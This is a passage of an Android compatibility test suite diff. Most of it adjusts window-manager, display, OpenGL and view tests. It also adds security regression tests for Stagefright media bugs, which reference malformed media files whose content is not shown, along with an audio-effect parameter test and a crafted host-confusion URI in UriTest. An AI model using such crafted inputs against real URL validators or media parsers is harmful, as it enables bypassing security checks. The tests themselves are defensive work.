+ private static final String TRANSLUCENT_ACTIVITY = "TranslucentLandscapeActivity";
private static final String TRANSLUCENT_CURRENT_PACKAGE = "android.server.translucentapp";
private static final String EXTRA_LAUNCH_NEW_TASK = "launch_new_task";
@@ -325,9 +323,9 @@
1 /* portrait */, initialReportedSizes.orientation);
logSeparator = clearLogcat();
- launchActivityInComponent(TRANSLUCENT_SDK_26_PACKAGE, TRANSLUCENT_ACTIVITY);
+ launchActivityInComponent(TRANSLUCENT_CURRENT_PACKAGE, TRANSLUCENT_ACTIVITY);
- assertEquals("Legacy non-fullscreen activity requested landscape orientation",
+ assertEquals("non-fullscreen activity requested landscape orientation",
0 /* landscape */, mAmWmState.getWmState().getLastOrientation());
// TODO(b/36897968): uncomment once we can suppress unsupported configurations
@@ -337,29 +335,13 @@
// 1 /* portrait */, updatedReportedSizes.orientation);
}
- public void testNonFullscreenActivityProhibited() throws Exception {
- setComponentName(TRANSLUCENT_CURRENT_PACKAGE);
-
- // We do not wait for the activity as it should not launch based on the restrictions around
- // specifying orientation. We instead start an activity known to launch immediately after
- // so that we can ensure processing the first activity occurred.
- launchActivityNoWait(TRANSLUCENT_ACTIVITY);
- setDefaultComponentName();
- launchActivity(PORTRAIT_ACTIVITY_NAME);
-
- assertFalse("target SDK > 26 non-fullscreen activity should not reach onResume",
- mAmWmState.getAmState().containsActivity(
- ActivityManagerTestBase.getActivityComponentName(
- TRANSLUCENT_ACTIVITY, TRANSLUCENT_ACTIVITY)));
- }
-
public void testNonFullscreenActivityPermitted() throws Exception {
- setComponentName(TRANSLUCENT_SDK_26_PACKAGE);
+ setComponentName(TRANSLUCENT_CURRENT_PACKAGE);
setDeviceRotation(0);
launchActivity(TRANSLUCENT_ACTIVITY);
mAmWmState.assertResumedActivity(
- "target SDK <= 26 non-fullscreen activity should be allowed to launch",
+ "target SDK non-fullscreen activity should be allowed to launch",
TRANSLUCENT_ACTIVITY);
assertEquals("non-fullscreen activity requested landscape orientation",
0 /* landscape */, mAmWmState.getWmState().getLastOrientation());
@@ -437,6 +419,11 @@
*/
private void requestOrientationInSplitScreen(int orientation, String activity)
throws Exception {
+ if (!supportsSplitScreenMultiWindow()) {
+ CLog.logAndDisplay(LogLevel.INFO, "Skipping test: no multi-window support");
+ return;
+ }
+
// Set initial orientation.
setDeviceRotation(orientation);
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAssistantStackTests.java b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAssistantStackTests.java
index 2ba142a..be2af68 100644
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAssistantStackTests.java
+++ b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerAssistantStackTests.java
@@ -162,7 +162,9 @@
EXTRA_IS_TRANSLUCENT, String.valueOf(true));
mAmWmState.waitForValidState(mDevice, TRANSLUCENT_ASSISTANT_ACTIVITY, ASSISTANT_STACK_ID);
assertAssistantStackExists();
- mAmWmState.assertHomeActivityVisible(true);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true);
+ }
// Launch a fullscreen app and then launch the assistant and check to see that it is
// also visible
@@ -186,7 +188,9 @@
pressBackButton();
mAmWmState.waitForFocusedStack(mDevice, ASSISTANT_STACK_ID);
assertAssistantStackExists();
- mAmWmState.assertHomeActivityVisible(true);
+ if (!noHomeScreen()) {
+ mAmWmState.assertHomeActivityVisible(true);
+ }
// Launch a fullscreen and docked app and then launch the assistant and check to see that it
// is also visible
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerDisplayTests.java b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerDisplayTests.java
index 932f8c4..bb54b06 100644
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerDisplayTests.java
+++ b/hostsidetests/services/activityandwindowmanager/activitymanager/src/android/server/cts/ActivityManagerDisplayTests.java
@@ -1650,6 +1650,8 @@
* on an external secondary display.
*/
public void testExternalDisplayActivityTurnPrimaryOff() throws Exception {
+ if (!supportsMultiDisplay()) { return; }
+
// Launch something on the primary display so we know there is a resumed activity there
launchActivity(RESIZEABLE_ACTIVITY_NAME);
waitAndAssertActivityResumed(RESIZEABLE_ACTIVITY_NAME, DEFAULT_DISPLAY_ID,
@@ -1681,6 +1683,8 @@
* display is off.
*/
public void testLaunchExternalDisplayActivityWhilePrimaryOff() throws Exception {
+ if (!supportsMultiDisplay()) { return; }
+
// Launch something on the primary display so we know there is a resumed activity there
launchActivity(RESIZEABLE_ACTIVITY_NAME);
waitAndAssertActivityResumed(RESIZEABLE_ACTIVITY_NAME, DEFAULT_DISPLAY_ID,
@@ -1708,6 +1712,8 @@
* Tests that turning the secondary display off stops activities running on that display.
*/
public void testExternalDisplayToggleState() throws Exception {
+ if (!supportsMultiDisplay()) { return; }
+
final DisplayState newDisplay = createExternalVirtualDisplay(
false /* showContentWhenLocked */);
@@ -1735,6 +1741,8 @@
* activity on the primary display.
*/
public void testStackFocusSwitchOnTouchEventAfterKeyguard() throws Exception {
+ if (!supportsMultiDisplay()) { return; }
+
// Launch something on the primary display so we know there is a resumed activity there
launchActivity(RESIZEABLE_ACTIVITY_NAME);
waitAndAssertActivityResumed(RESIZEABLE_ACTIVITY_NAME, DEFAULT_DISPLAY_ID,
@@ -1818,6 +1826,8 @@
* Tests that showWhenLocked works on a secondary display.
*/
public void testSecondaryDisplayShowWhenLocked() throws Exception {
+ if (!supportsMultiDisplay()) { return; }
+
try {
setLockCredential();
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/Android.mk b/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/Android.mk
deleted file mode 100644
index dbb0b2b..0000000
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/Android.mk
+++ /dev/null
@@ -1,32 +0,0 @@
-# Copyright (C) 2017 The Android Open Source Project
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-# http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-
-LOCAL_PATH:= $(call my-dir)
-
-include $(CLEAR_VARS)
-
-# Don't include this package in any target.
-LOCAL_MODULE_TAGS := tests
-
-LOCAL_SRC_FILES := \
- $(call all-java-files-under, ../translucentapp/src) \
-
-LOCAL_SDK_VERSION := 26
-
-# Tag this module as a cts test artifact
-LOCAL_COMPATIBILITY_SUITE := cts vts general-tests
-
-LOCAL_PACKAGE_NAME := CtsDeviceTranslucentTestApp26
-
-include $(BUILD_CTS_SUPPORT_PACKAGE)
diff --git a/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/AndroidManifest.xml b/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/AndroidManifest.xml
deleted file mode 100755
index 43c85f5..0000000
--- a/hostsidetests/services/activityandwindowmanager/activitymanager/translucentappsdk26/AndroidManifest.xml
+++ /dev/null
@@ -1,33 +0,0 @@
-<?xml version="1.0" encoding="utf-8"?>
-<!--
- ~ Copyright (C) 2017 The Android Open Source Project
- ~
- ~ Licensed under the Apache License, Version 2.0 (the "License");
- ~ you may not use this file except in compliance with the License.
- ~ You may obtain a copy of the License at
- ~
- ~ http://www.apache.org/licenses/LICENSE-2.0
- ~
- ~ Unless required by applicable law or agreed to in writing, software
- ~ distributed under the License is distributed on an "AS IS" BASIS,
- ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
- ~ See the License for the specific language governing permissions and
- ~ limitations under the License
- -->
-
-<manifest xmlns:android="http://schemas.android.com/apk/res/android"
- xmlns:androidprv="http://schemas.android.com/apk/prv/res/android"
- package="android.server.translucentapp26">
- <application android:label="CtsTranslucentApp26">
- <activity android:name="android.server.translucentapp.TranslucentLandscapeActivity"
- android:theme="@android:style/Theme.Translucent.NoTitleBar"
- android:exported="true"
- android:screenOrientation="landscape">
- <intent-filter>
- <action android:name="android.intent.action.MAIN"/>
- <category android:name="android.intent.category.LAUNCHER"/>
- </intent-filter>
- </activity>
- </application>
-</manifest>
-
diff --git a/tests/app/src/android/app/cts/ActivityKeyboardShortcutsTest.java b/tests/app/src/android/app/cts/ActivityKeyboardShortcutsTest.java
index 7f5c49c..601dafd 100644
--- a/tests/app/src/android/app/cts/ActivityKeyboardShortcutsTest.java
+++ b/tests/app/src/android/app/cts/ActivityKeyboardShortcutsTest.java
@@ -91,6 +91,8 @@
private boolean keyboardShortcutsSupported() {
// Keyboard shortcuts API is not supported on watches.
// TODO(b/62257073): Provide a more granular feature to check here.
- return !mActivity.getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH);
+ // 2017-10-17: Updated to also exclude EMBEDDED
+ return !mActivity.getPackageManager().hasSystemFeature(PackageManager.FEATURE_WATCH) &&
+ !mActivity.getPackageManager().hasSystemFeature(PackageManager.FEATURE_EMBEDDED);
}
}
diff --git a/tests/app/src/android/app/cts/SystemFeaturesTest.java b/tests/app/src/android/app/cts/SystemFeaturesTest.java
index f03c549..53b1bf2 100644
--- a/tests/app/src/android/app/cts/SystemFeaturesTest.java
+++ b/tests/app/src/android/app/cts/SystemFeaturesTest.java
@@ -258,6 +258,14 @@
}
}
+ public void testLowRamFeature() {
+ if (mActivityManager.isLowRamDevice()) {
+ assertAvailable(PackageManager.FEATURE_RAM_LOW);
+ } else {
+ assertAvailable(PackageManager.FEATURE_RAM_NORMAL);
+ }
+ }
+
public void testNfcFeatures() {
if (NfcAdapter.getDefaultAdapter(mContext) != null) {
// Watches MAY support all FEATURE_NFC features when an NfcAdapter is available, but
@@ -473,7 +481,8 @@
// false negatives.
if (!mPackageManager.hasSystemFeature(PackageManager.FEATURE_AUTOMOTIVE) &&
!mPackageManager.hasSystemFeature(PackageManager.FEATURE_TELEVISION) &&
- !mPackageManager.hasSystemFeature(PackageManager.FEATURE_WATCH)) {
+ !mPackageManager.hasSystemFeature(PackageManager.FEATURE_WATCH) &&
+ !mPackageManager.hasSystemFeature(PackageManager.FEATURE_EMBEDDED)) {
// USB accessory mode is only a requirement for devices with USB ports supporting
// peripheral mode. As there is no public API to distinguish a device with only host
// mode support from having both peripheral and host support, the test may have
diff --git a/tests/tests/graphics/src/android/graphics/cts/CameraGpuCtsActivity.java b/tests/tests/graphics/src/android/graphics/cts/CameraGpuCtsActivity.java
index b743e7d..466912a 100644
--- a/tests/tests/graphics/src/android/graphics/cts/CameraGpuCtsActivity.java
+++ b/tests/tests/graphics/src/android/graphics/cts/CameraGpuCtsActivity.java
@@ -93,7 +93,7 @@
public void waitToFinishRendering() throws InterruptedException {
// Wait long enough so that all frames are captured.
- if (!mFinishedRendering.await(10, TimeUnit.SECONDS)) {
+ if (!mFinishedRendering.await(30, TimeUnit.SECONDS)) {
throw new IllegalStateException("Coudn't finish drawing frames!");
}
}
diff --git a/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java b/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
index a2ddb4d..baffdab 100644
--- a/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
+++ b/tests/tests/hardware/src/android/hardware/cts/LowRamDeviceTest.java
@@ -52,6 +52,7 @@
private static final long ONE_MEGABYTE = 1048576L;
private static final String TAG = "LowRamDeviceTest";
+ private static final long LOW_RAM_MAX = 1024;
private PackageManager mPackageManager;
private ActivityManager mActivityManager;
@@ -105,7 +106,7 @@
if (supports64Bit) {
assertMinMemoryMb(1824);
} else {
- assertMinMemoryMb(1099);
+ assertMinMemoryMb(1344);
}
} else if (greaterThanDpi(density, DENSITY_400, screenSize,
SCREENLAYOUT_SIZE_NORMAL, SCREENLAYOUT_SIZE_SMALL) ||
@@ -155,7 +156,7 @@
private void assertMinMemoryMb(long minMb) {
long totalMemoryMb = getTotalMemory() / ONE_MEGABYTE;
- boolean lowRam = totalMemoryMb <= 512;
+ boolean lowRam = totalMemoryMb <= LOW_RAM_MAX;
boolean lowRamDevice = mActivityManager.isLowRamDevice();
Log.i(TAG, String.format("minMb=%,d", minMb));
diff --git a/tests/tests/net/src/android/net/cts/UriTest.java b/tests/tests/net/src/android/net/cts/UriTest.java
index ab337d0..05e826a 100644
--- a/tests/tests/net/src/android/net/cts/UriTest.java
+++ b/tests/tests/net/src/android/net/cts/UriTest.java
@@ -109,6 +109,11 @@
uri = Uri.parse("http://localhost");
assertEquals("localhost", uri.getHost());
assertEquals(-1, uri.getPort());
+
+ uri = Uri.parse("http://a:a@example.com:a@example2.com/path");
+ assertEquals("a:a@example.com:a@example2.com", uri.getAuthority());
+ assertEquals("example2.com", uri.getHost());
+ assertEquals(-1, uri.getPort());
}
public void testCompareTo() {
diff --git a/tests/tests/openglperf/src/android/openglperf/cts/GlPlanetsActivity.java b/tests/tests/openglperf/src/android/openglperf/cts/GlPlanetsActivity.java
index 432fb41..9d898c2 100644
--- a/tests/tests/openglperf/src/android/openglperf/cts/GlPlanetsActivity.java
+++ b/tests/tests/openglperf/src/android/openglperf/cts/GlPlanetsActivity.java
@@ -43,6 +43,7 @@
private float mAverageFps;
private int mNumTriangles;
private int[] mFrameInterval;
+ private String mRendererName;
private PlanetsSurfaceView mView;
@@ -59,6 +60,10 @@
return mNumTriangles;
}
+ public String getRendererName() {
+ return mRendererName;
+ }
+
/**
* Time interval between each frame's rendering in ms.
* The first value will be invalid, so client should discard them.
@@ -89,10 +94,12 @@
}
@Override
- public void onRenderCompletion(float averageFps, int numTriangles, int[] frameInterval) {
+ public void onRenderCompletion(float averageFps, int numTriangles, int[] frameInterval,
+ String rendererName) {
mAverageFps = averageFps;
mNumTriangles = numTriangles;
mFrameInterval = frameInterval;
+ mRendererName = rendererName;
mSem.release();
}
diff --git a/tests/tests/openglperf/src/android/openglperf/cts/GlVboPerfTest.java b/tests/tests/openglperf/src/android/openglperf/cts/GlVboPerfTest.java
index ecf198e..622963d 100644
--- a/tests/tests/openglperf/src/android/openglperf/cts/GlVboPerfTest.java
+++ b/tests/tests/openglperf/src/android/openglperf/cts/GlVboPerfTest.java
@@ -33,6 +33,9 @@
private float mFps;
private int mNumTriangles;
+ private boolean mIsSoftwareRenderer = false;
+
+ private static final String SWIFTSHADER_NAME = "Google SwiftShader";
public GlVboPerfTest() {
super(GlPlanetsActivity.class);
@@ -70,12 +73,14 @@
float delta = minMaxVbo[1] - (1f - FPS_COMPARISON_MARGIN)
* minMaxNonVbo[1];
assertTrue("VBO performance worse than non-VBO " + msgVbo + msgNonVbo, delta > 0f);
- assertTrue(
- "Too much FPS drop for VBO case " + msgVbo,
- minMaxVbo[0] > (FPS_MIN_MAX_COMPARISON_PERCENTILE * minMaxVbo[1]));
- assertTrue(
- "Too much FPS drop for No VBO case " + msgNonVbo,
- minMaxNonVbo[0] > (FPS_MIN_MAX_COMPARISON_PERCENTILE * minMaxNonVbo[1]));
+ if (!mIsSoftwareRenderer) {
+ assertTrue(
+ "Too much FPS drop for VBO case " + msgVbo,
+ minMaxVbo[0] > (FPS_MIN_MAX_COMPARISON_PERCENTILE * minMaxVbo[1]));
+ assertTrue(
+ "Too much FPS drop for No VBO case " + msgNonVbo,
+ minMaxNonVbo[0] > (FPS_MIN_MAX_COMPARISON_PERCENTILE * minMaxNonVbo[1]));
+ }
}
public void testVboVsNonVboPerfGeometry0() throws Exception {
@@ -104,6 +109,9 @@
mFps = activity.getAverageFps();
mNumTriangles = activity.getNumTriangles();
+ if (SWIFTSHADER_NAME.equals(activity.getRendererName())) {
+ mIsSoftwareRenderer = true;
+ }
cleanUpActivity();
}
diff --git a/tests/tests/openglperf/src/android/openglperf/cts/PlanetsRenderer.java b/tests/tests/openglperf/src/android/openglperf/cts/PlanetsRenderer.java
index 1d79961..9dd078e 100644
--- a/tests/tests/openglperf/src/android/openglperf/cts/PlanetsRenderer.java
+++ b/tests/tests/openglperf/src/android/openglperf/cts/PlanetsRenderer.java
@@ -88,6 +88,7 @@
private int mTexCoord0Handle;
private int mTextureHandle;
private int mTextureId;
+ private String mRendererName;
/**
* @param numSlices
@@ -142,6 +143,7 @@
mPositionHandle = GLES20.glGetAttribLocation(mProgram, "vPosition");
mTexCoord0Handle = GLES20.glGetAttribLocation(mProgram, "vTexCoord0");
mTextureHandle = GLES20.glGetUniformLocation(mProgram, "sTexture");
+ mRendererName = GLES20.glGetString(GLES20.GL_RENDERER);
// Load the texture
mTextureId = createTexture2D();
@@ -245,7 +247,7 @@
Log.i(TAG, "Final FPS " + fps + " Num triangles " + numTriangles + " start time " +
mRenderingStartTime + " finish time " + currentTime);
if (mListener != null) {
- mListener.onRenderCompletion(fps, numTriangles, mFrameInterval);
+ mListener.onRenderCompletion(fps, numTriangles, mFrameInterval, mRendererName);
mFrameCount++; // to prevent entering here again
return;
}
@@ -438,7 +440,7 @@
private void printGlInfos() {
Log.i(TAG, "Vendor " + GLES20.glGetString(GLES20.GL_VENDOR));
Log.i(TAG, "Version " + GLES20.glGetString(GLES20.GL_VERSION));
- Log.i(TAG, "Renderer " + GLES20.glGetString(GLES20.GL_RENDERER));
+ Log.i(TAG, "Renderer " + mRendererName);
Log.i(TAG, "Extensions " + GLES20.glGetString(GLES20.GL_EXTENSIONS));
}
private void printParams() {
diff --git a/tests/tests/openglperf/src/android/openglperf/cts/RenderCompletionListener.java b/tests/tests/openglperf/src/android/openglperf/cts/RenderCompletionListener.java
index a5bbfa2..bb63d66 100644
--- a/tests/tests/openglperf/src/android/openglperf/cts/RenderCompletionListener.java
+++ b/tests/tests/openglperf/src/android/openglperf/cts/RenderCompletionListener.java
@@ -25,6 +25,7 @@
* @param numTriangles Number of triangles in geometric model
* @param frameInterval interval for each frame in ms. Do not use the first one and the last one.
*/
- void onRenderCompletion(float averageFps, int numTriangles, int[] frameInterval);
+ void onRenderCompletion(float averageFps, int numTriangles, int[] frameInterval,
+ String rendererName);
}
diff --git a/tests/tests/preference2/src/android/preference2/cts/PreferenceActivityFlowTest.java b/tests/tests/preference2/src/android/preference2/cts/PreferenceActivityFlowTest.java
index 731dbfb..253f8f6 100644
--- a/tests/tests/preference2/src/android/preference2/cts/PreferenceActivityFlowTest.java
+++ b/tests/tests/preference2/src/android/preference2/cts/PreferenceActivityFlowTest.java
@@ -487,14 +487,29 @@
// Go to preferences inner fragment.
mTestUtils.tapOnViewWithText(INNER_FRAGMENT_PREF_BUTTON);
- // We don't need to check that correct panel is displayed that is already covered by
- // smallScreenGoToFragmentInner and largeScreenGoToFragmentInner
+ // Only inner fragment must be shown.
+ if (shouldRunLargeDeviceTest()) {
+ assertHeadersShown();
+ } else {
+ assertHeadersHidden();
+ }
+ assertPanelPrefs1Hidden();
+ assertInnerFragmentShown();
// Take screenshot
Bitmap before = mTestUtils.takeScreenshot();
recreate();
+ // Only inner fragment must be shown.
+ if (shouldRunLargeDeviceTest()) {
+ assertHeadersShown();
+ } else {
+ assertHeadersHidden();
+ }
+ assertPanelPrefs1Hidden();
+ assertInnerFragmentShown();
+
// Compare screenshots
Bitmap after = mTestUtils.takeScreenshot();
assertScreenshotsAreEqual(before, after);
diff --git a/tests/tests/print/src/android/print/cts/BasePrintTest.java b/tests/tests/print/src/android/print/cts/BasePrintTest.java
index ebcd41e..db1efd7 100644
--- a/tests/tests/print/src/android/print/cts/BasePrintTest.java
+++ b/tests/tests/print/src/android/print/cts/BasePrintTest.java
@@ -743,10 +743,13 @@
}
static void clearPrintSpoolerData() throws Exception {
- assertTrue("failed to clear print spooler data",
- SystemUtil.runShellCommand(getInstrumentation(), String.format(
- "pm clear --user %d %s", CURRENT_USER_ID, PRINT_SPOOLER_PACKAGE_NAME))
- .contains(PM_CLEAR_SUCCESS_OUTPUT));
+ if (getInstrumentation().getContext().getPackageManager().hasSystemFeature(
+ PackageManager.FEATURE_PRINTING)) {
+ assertTrue("failed to clear print spooler data",
+ SystemUtil.runShellCommand(getInstrumentation(), String.format(
+ "pm clear --user %d %s", CURRENT_USER_ID, PRINT_SPOOLER_PACKAGE_NAME))
+ .contains(PM_CLEAR_SUCCESS_OUTPUT));
+ }
}
void verifyLayoutCall(InOrder inOrder, PrintDocumentAdapter mock,
diff --git a/tests/tests/security/res/raw/bug_37930177_hevc.mp4 b/tests/tests/security/res/raw/bug_37930177_hevc.mp4
new file mode 100644
index 0000000..28b6699
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_37930177_hevc.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_64710074.mp4 b/tests/tests/security/res/raw/bug_64710074.mp4
new file mode 100644
index 0000000..5544ffe
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_64710074.mp4
Binary files differ
diff --git a/tests/tests/security/res/raw/bug_67737022.mp4 b/tests/tests/security/res/raw/bug_67737022.mp4
new file mode 100644
index 0000000..c2136e5
--- /dev/null
+++ b/tests/tests/security/res/raw/bug_67737022.mp4
Binary files differ
diff --git a/tests/tests/security/src/android/security/cts/BitmapTest.java b/tests/tests/security/src/android/security/cts/BitmapTest.java
new file mode 100644
index 0000000..6253f0a
--- /dev/null
+++ b/tests/tests/security/src/android/security/cts/BitmapTest.java
@@ -0,0 +1,41 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import org.junit.runner.RunWith;
+import org.junit.Test;
+
+import android.graphics.Bitmap;
+import android.platform.test.annotations.SecurityTest;
+import android.support.test.runner.AndroidJUnit4;
+
+@SecurityTest
+@RunWith(AndroidJUnit4.class)
+public class BitmapTest {
+ /**
+ * Test Bitmap.createBitmap properly throws OOME on large inputs.
+ *
+ * A prior change in behavior resulted in throwing an NPE instead.
+ * OOME is more appropriate.
+ */
+ @Test(expected=OutOfMemoryError.class)
+ public void test_33846679() {
+ // This size is based on the max size possible in a GIF file,
+ // which might be passed to createBitmap from a Java decoder.
+ Bitmap.createBitmap(65535, 65535, Bitmap.Config.ARGB_8888);
+ }
+}
diff --git a/tests/tests/security/src/android/security/cts/EffectBundleTest.java b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
index fb02333..ae55494 100644
--- a/tests/tests/security/src/android/security/cts/EffectBundleTest.java
+++ b/tests/tests/security/src/android/security/cts/EffectBundleTest.java
@@ -19,6 +19,7 @@
import android.media.audiofx.AudioEffect;
import android.media.audiofx.EnvironmentalReverb;
import android.media.audiofx.Equalizer;
+import android.media.audiofx.PresetReverb;
import android.media.MediaPlayer;
import android.platform.test.annotations.SecurityTest;
import android.test.InstrumentationTestCase;
@@ -247,6 +248,16 @@
);
}
+ //Testing security bug: 67647856
+ @SecurityTest
+ public void testPresetReverb_setParameter() throws Exception {
+ verifyZeroPVSizeRejectedForSetParameter(
+ AudioEffect.EFFECT_TYPE_PRESET_REVERB, new int[] {
+ PresetReverb.PARAM_PRESET
+ }
+ );
+ }
+
private boolean eqSetParamProperties(int media) {
MediaPlayer mp = null;
Equalizer eq = null;
diff --git a/tests/tests/security/src/android/security/cts/StagefrightTest.java b/tests/tests/security/src/android/security/cts/StagefrightTest.java
index 42d8e41..ee36ca8 100644
--- a/tests/tests/security/src/android/security/cts/StagefrightTest.java
+++ b/tests/tests/security/src/android/security/cts/StagefrightTest.java
@@ -75,6 +75,11 @@
***********************************************************/
@SecurityTest
+ public void testStagefright_bug_64710074() throws Exception {
+ doStagefrightTest(R.raw.bug_64710074);
+ }
+
+ @SecurityTest
public void testStagefright_cve_2017_0643() throws Exception {
doStagefrightTest(R.raw.cve_2017_0643);
}
@@ -411,6 +416,17 @@
doStagefrightTest(R.raw.bug_35467107);
}
+ /***********************************************************
+ to prevent merge conflicts, add O tests below this comment,
+ before any existing test methods
+ ***********************************************************/
+
+ @SecurityTest
+ public void testBug_67737022() throws Exception {
+ doStagefrightTest(R.raw.bug_67737022);
+ }
+
+
private void doStagefrightTest(final int rid) throws Exception {
doStagefrightTestMediaPlayer(rid);
doStagefrightTestMediaCodec(rid);
@@ -877,6 +893,11 @@
doStagefrightTestRawBlob(R.raw.cve_2017_0687, "video/avc", 320, 240);
}
+ @SecurityTest
+ public void testBug_37930177() throws Exception {
+ doStagefrightTestRawBlob(R.raw.bug_37930177_hevc, "video/hevc", 320, 240);
+ }
+
private void runWithTimeout(Runnable runner, int timeout) {
Thread t = new Thread(runner);
t.start();
diff --git a/tests/tests/systemui/src/android/systemui/cts/LightBarThemeTest.java b/tests/tests/systemui/src/android/systemui/cts/LightBarThemeTest.java
index b385ecd..282a002 100644
--- a/tests/tests/systemui/src/android/systemui/cts/LightBarThemeTest.java
+++ b/tests/tests/systemui/src/android/systemui/cts/LightBarThemeTest.java
@@ -19,7 +19,9 @@
import static android.support.test.InstrumentationRegistry.getInstrumentation;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
+import static org.junit.Assume.assumeFalse;
+import android.content.pm.PackageManager;
import android.graphics.Bitmap;
import android.support.test.rule.ActivityTestRule;
import android.support.test.runner.AndroidJUnit4;
@@ -48,6 +50,8 @@
@Before
public void setUp() {
+ assumeFalse(getInstrumentation().getContext().getPackageManager().hasSystemFeature(
+ PackageManager.FEATURE_EMBEDDED));
mDevice = UiDevice.getInstance(getInstrumentation());
}
diff --git a/tests/tests/view/res/layout/view_layout.xml b/tests/tests/view/res/layout/view_layout.xml
index 3cfaafa..c3b97c5 100644
--- a/tests/tests/view/res/layout/view_layout.xml
+++ b/tests/tests/view/res/layout/view_layout.xml
@@ -36,7 +36,11 @@
android:scrollbars="horizontal|vertical"
android:fadingEdge="horizontal|vertical"
android:scrollIndicators="top|bottom"
- android:fadingEdgeLength="20px"/>
+ android:fadingEdgeLength="20px"
+ android:scrollbarThumbVertical="@null"
+ android:scrollbarTrackVertical="@null"
+ android:scrollbarThumbHorizontal="@null"
+ android:scrollbarTrackHorizontal="@null"/>
<android.view.cts.MockView
android:id="@+id/scroll_view_2"
@@ -44,7 +48,11 @@
android:layout_height="200px"
android:scrollbars="horizontal|vertical"
android:requiresFadingEdge="horizontal|vertical"
- android:fadingEdgeLength="20px"/>
+ android:fadingEdgeLength="20px"
+ android:scrollbarThumbVertical="@null"
+ android:scrollbarTrackVertical="@null"
+ android:scrollbarThumbHorizontal="@null"
+ android:scrollbarTrackHorizontal="@null"/>
<android.view.cts.MockView
android:id="@+id/scroll_view_3"
@@ -52,7 +60,9 @@
android:layout_height="200px"
android:scrollbars="horizontal|vertical"
android:scrollbarThumbVertical="@drawable/scrollbar_no_size"
- android:scrollbarThumbHorizontal="@drawable/scrollbar_no_size"/>
+ android:scrollbarTrackVertical="@null"
+ android:scrollbarThumbHorizontal="@drawable/scrollbar_no_size"
+ android:scrollbarTrackHorizontal="@null"/>
<android.view.cts.MockView
android:id="@+id/scroll_view_4"
@@ -60,7 +70,9 @@
android:layout_height="200px"
android:scrollbars="horizontal|vertical"
android:scrollbarThumbVertical="@drawable/scrollbar_thumb"
- android:scrollbarThumbHorizontal="@drawable/scrollbar_thumb"/>
+ android:scrollbarTrackVertical="@null"
+ android:scrollbarThumbHorizontal="@drawable/scrollbar_thumb"
+ android:scrollbarTrackHorizontal="@null"/>
<android.view.cts.MockView
android:id="@+id/scroll_view_5"
diff --git a/tests/tests/view/src/android/view/animation/cts/AnimationTest.java b/tests/tests/view/src/android/view/animation/cts/AnimationTest.java
index aac14e6..d3bc8e0 100644
--- a/tests/tests/view/src/android/view/animation/cts/AnimationTest.java
+++ b/tests/tests/view/src/android/view/animation/cts/AnimationTest.java
@@ -77,7 +77,7 @@
/** It is defined in R.anim.decelerate_alpha */
private static final int DECELERATE_ALPHA_DURATION = 2000;
- private static final int CANCELATION_TIMEOUT = 1000;
+ private static final int CANCELATION_TIMEOUT = 5000;
private Instrumentation mInstrumentation;
private Activity mActivity;
diff --git a/tests/tests/view/src/android/view/cts/ChoreographerTest.java b/tests/tests/view/src/android/view/cts/ChoreographerTest.java
index e152d5b..a232b51 100644
--- a/tests/tests/view/src/android/view/cts/ChoreographerTest.java
+++ b/tests/tests/view/src/android/view/cts/ChoreographerTest.java
@@ -82,7 +82,7 @@
// We expect the remaining callbacks to have been invoked once.
verify(addedCallback1, timeout(NOMINAL_VSYNC_PERIOD * 10).times(1)).run();
- verify(addedCallback2, times(1)).run();
+ verify(addedCallback2, timeout(NOMINAL_VSYNC_PERIOD * 10).times(1)).run();
verifyZeroInteractions(removedCallback);
// If we post a callback again, then it should be invoked again.
diff --git a/tests/tests/view/src/android/view/cts/DragDropTest.java b/tests/tests/view/src/android/view/cts/DragDropTest.java
index f32f79a..39ae2d3 100644
--- a/tests/tests/view/src/android/view/cts/DragDropTest.java
+++ b/tests/tests/view/src/android/view/cts/DragDropTest.java
@@ -283,6 +283,9 @@
mActivity = mActivityRule.getActivity();
mStartReceived = new CountDownLatch(1);
mEndReceived = new CountDownLatch(1);
+
+ // Wait for idle
+ mInstrumentation.waitForIdleSync();
}
@After
diff --git a/tests/tests/view/src/android/view/cts/PixelCopyViewProducerActivity.java b/tests/tests/view/src/android/view/cts/PixelCopyViewProducerActivity.java
